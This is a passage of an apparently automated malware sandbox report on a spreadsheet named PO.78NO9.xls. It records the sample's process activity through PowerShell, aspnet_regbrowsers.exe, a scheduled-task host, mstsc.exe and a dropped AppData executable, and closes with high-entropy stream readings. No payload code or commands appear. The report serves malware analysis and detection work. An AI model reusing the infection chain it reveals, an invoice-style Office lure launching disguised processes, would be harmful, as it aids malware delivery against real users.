      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: PO.78NO9.xlsStream path 'MBD008EDE52/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
      Source: PO.78NO9.xlsStream path 'Workbook' entropy: 7.99872932515 (max. 8.0)
      Source: FC830000.0.drStream path 'MBD008EDE52/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
      Source: FC830000.0.drStream path 'Workbook' entropy: 7.99888812156 (max. 8.0)
